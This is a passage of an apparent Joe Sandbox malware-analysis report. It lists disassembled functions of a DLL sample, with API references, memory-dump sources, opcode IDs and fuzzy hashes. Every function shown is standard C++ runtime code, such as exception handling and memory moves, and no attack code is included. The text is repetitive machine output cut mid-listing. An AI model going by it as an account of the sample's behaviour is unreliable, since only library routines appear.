                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 2621100827-1858359205
                                                                                                          • Opcode ID: 6a887daa614ca6ccfec49bc4b576e25a52dfcef1ae6ba38f613db5593108a323
                                                                                                          • Instruction ID: cbfcca2b056d146c4a67a669d01f1d0897f0abd051a05fcd088c0a68d2a2e33a
                                                                                                          • Opcode Fuzzy Hash: 6a887daa614ca6ccfec49bc4b576e25a52dfcef1ae6ba38f613db5593108a323
                                                                                                          • Instruction Fuzzy Hash: 5E514BB1A0174AAFCB04CFA8C980B89BBF4FB09304F50826ED419D7B81D771E954CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045F00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 135COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F046035
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04604A
                                                                                                          • std::exception::exception.LIBCMT ref: 6F046059
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04606E
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 2621100827-1858359205
                                                                                                          • Opcode ID: f58722fcf05cfb669dce65b842bf34d25dbb1dbab4f954f30948afa050080dc1
                                                                                                          • Instruction ID: d2eda407efd42b6bc169d25c71c2b49cce4e6e6a6719120760487f1fc9a0022b
                                                                                                          • Opcode Fuzzy Hash: f58722fcf05cfb669dce65b842bf34d25dbb1dbab4f954f30948afa050080dc1
                                                                                                          • Instruction Fuzzy Hash: 8A5138B1A00609EFCB04CFA8C980B99BBF4FB09304F50826AD41997B81D775E954CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0813A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F0813BE
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F081431
                                                                                                          • _memmove.LIBCMT ref: 6F081456
                                                                                                          • _memmove.LIBCMT ref: 6F081493
                                                                                                          • _memmove.LIBCMT ref: 6F0814B0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: deque<T> too long
                                                                                                          • API String ID: 4034224661-309773918
                                                                                                          • Opcode ID: ee44f842ec59d03425bdd66dfdb83dfd6ca53d631f526ce6647a9a90661f3ebb
                                                                                                          • Instruction ID: 8564a2da4342b29104c36756f4a4aa03c9612cc69929e4022aac380bf5cd955d
                                                                                                          • Opcode Fuzzy Hash: ee44f842ec59d03425bdd66dfdb83dfd6ca53d631f526ce6647a9a90661f3ebb
                                                                                                          • Instruction Fuzzy Hash: F941F472A043049BCB04CE68DC81B6BB7E6EFC4614F09862DE869D7349EB34ED05C7A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F081250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F08126E
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F0812E0
                                                                                                          • _memmove.LIBCMT ref: 6F081305
                                                                                                          • _memmove.LIBCMT ref: 6F081342
                                                                                                          • _memmove.LIBCMT ref: 6F08135F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: deque<T> too long
                                                                                                          • API String ID: 4034224661-309773918
                                                                                                          • Opcode ID: fba411adcd49eb1cd7f6535f22e1033e17a1914529b7601b172f80e6e75d5b30
                                                                                                          • Instruction ID: 49ce6ef5e7f311bee46ea7a7c6afe65763761de66fd4d7245ad923a7a6be0d95
                                                                                                          • Opcode Fuzzy Hash: fba411adcd49eb1cd7f6535f22e1033e17a1914529b7601b172f80e6e75d5b30
                                                                                                          • Instruction Fuzzy Hash: DE411B72A042045BDB04DF68DD8076BB7D6EFC4614F09862DE829D7348EA34ED058791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045DB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045E87
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045E9C
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045EAB
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045EC0
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 2621100827-1858359205
                                                                                                          • Opcode ID: 37ce196a29db1a06401d698a88ada33fa46cb89a387a53d9eb47a4c14207864d
                                                                                                          • Instruction ID: d55375c72671add89f6960053ae2d13ac478936ead9148f111728606b916fe1a
                                                                                                          • Opcode Fuzzy Hash: 37ce196a29db1a06401d698a88ada33fa46cb89a387a53d9eb47a4c14207864d
                                                                                                          • Instruction Fuzzy Hash: 524128B19007489FCB24CFA9C980B9ABBF4FB09304F40496ED45A97B81E775E504CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03D360 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03D437
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03D44C
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03D45B
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03D470
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 2621100827-1858359205
                                                                                                          • Opcode ID: 2070b2888f3fb60d55917a4a9ed871f52fbd9a2453d0d4667f8608dde0cc2691
                                                                                                          • Instruction ID: 2869fce7d53aa884bff0acaac73fad7b43243a36e535acad6a27d32543b2f277
                                                                                                          • Opcode Fuzzy Hash: 2070b2888f3fb60d55917a4a9ed871f52fbd9a2453d0d4667f8608dde0cc2691
                                                                                                          • Instruction Fuzzy Hash: D8414BB19007489FCB20CFA8D980B8ABBF4FB09304F40496ED45A97781D771F504CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F082B80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056518
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056558
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F082C9A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F082CB1
                                                                                                          • std::exception::exception.LIBCMT ref: 6F082CC3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F082CDA
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$std::exception::exception$_malloc
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 3942750879-1858359205
                                                                                                          • Opcode ID: 9edf5e04bb7a850d0102acfa8e81c591f8bab5237830dd03b8982b125ee59e32
                                                                                                          • Instruction ID: 8875502bbfb35dfe279247f10047f6379e9a2afe8e93a450887780b6a1cfc4cb
                                                                                                          • Opcode Fuzzy Hash: 9edf5e04bb7a850d0102acfa8e81c591f8bab5237830dd03b8982b125ee59e32
                                                                                                          • Instruction Fuzzy Hash: 924145B15187419FC724CF68C880B4AFBF4FF99714F508A2EE1AA87690D7B1A504CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024DA9
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F08913A
                                                                                                            • Part of subcall function 6F089125: __CxxThrowException@8.LIBCMT ref: 6F08914F
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F089160
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024DCA
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024DE5
                                                                                                          • _memmove.LIBCMT ref: 6F024E4D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 443534600-4289949731
                                                                                                          • Opcode ID: 40e84fa155005a3f49617a1676d2821ca8bd178c59d59ef0971b3b2a128fec14
                                                                                                          • Instruction ID: f8405f50f05c62daacb5fde95934b78891d68bfcf211be71a4da78de0a082af3
                                                                                                          • Opcode Fuzzy Hash: 40e84fa155005a3f49617a1676d2821ca8bd178c59d59ef0971b3b2a128fec14
                                                                                                          • Instruction Fuzzy Hash: 6631CA36304310AFEB249E6CE880B6AF7E6BF95725B10062FE555CB642D771D840C7B1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DC40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DCC5
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DCDA
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DD09
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DD1E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 399550787-1858359205
                                                                                                          • Opcode ID: 976d55fb49bc7ad9f3521aceb5c0601d4a5460b0be93abbae646de4d34287e23
                                                                                                          • Instruction ID: 639ded9c7eaadecc90b0b8c0f0cf41f9bc3b85506c5b5f05ee5988784a76dac3
                                                                                                          • Opcode Fuzzy Hash: 976d55fb49bc7ad9f3521aceb5c0601d4a5460b0be93abbae646de4d34287e23
                                                                                                          • Instruction Fuzzy Hash: BD314FB5900309AFDB04DF99D840B9EBBF8BF55710F4085AEE9199B390D771EA04CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0944E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name::operator+$NameName::
                                                                                                          • String ID: throw(
                                                                                                          • API String ID: 168861036-3159766648
                                                                                                          • Opcode ID: 0df8ec8b41bd60acadd9c4f005a59d45df2f9aa535305bae38ee01132dbc8551
                                                                                                          • Instruction ID: b86811a37875e50346824da682e620280ca5e3c560113160e5cd4a20b47a83fb
                                                                                                          • Opcode Fuzzy Hash: 0df8ec8b41bd60acadd9c4f005a59d45df2f9aa535305bae38ee01132dbc8551
                                                                                                          • Instruction Fuzzy Hash: 94019274A00209BFCF04DBA4C856FED7BB9EB48308F409155F505AB2D5FB30E9469B90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08CCF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd_noexit.LIBCMT ref: 6F08CCFA
                                                                                                            • Part of subcall function 6F08EA6D: GetLastError.KERNEL32(?,?,6F08D7DD,6F089DEF,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F08EA71
                                                                                                            • Part of subcall function 6F08EA6D: ___set_flsgetvalue.LIBCMT ref: 6F08EA7F
                                                                                                            • Part of subcall function 6F08EA6D: __calloc_crt.LIBCMT ref: 6F08EA93
                                                                                                            • Part of subcall function 6F08EA6D: DecodePointer.KERNEL32(00000000,?,?,6F08D7DD,6F089DEF,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F08EAAD
                                                                                                            • Part of subcall function 6F08EA6D: GetCurrentThreadId.KERNEL32 ref: 6F08EAC3
                                                                                                            • Part of subcall function 6F08EA6D: SetLastError.KERNEL32(00000000,?,?,6F08D7DD,6F089DEF,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F08EADB
                                                                                                          • __calloc_crt.LIBCMT ref: 6F08CD1C
                                                                                                          • __get_sys_err_msg.LIBCMT ref: 6F08CD3A
                                                                                                          • _strcpy_s.LIBCMT ref: 6F08CD42
                                                                                                          • __invoke_watson.LIBCMT ref: 6F08CD57
                                                                                                          Strings
                                                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6F08CD07, 6F08CD2A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
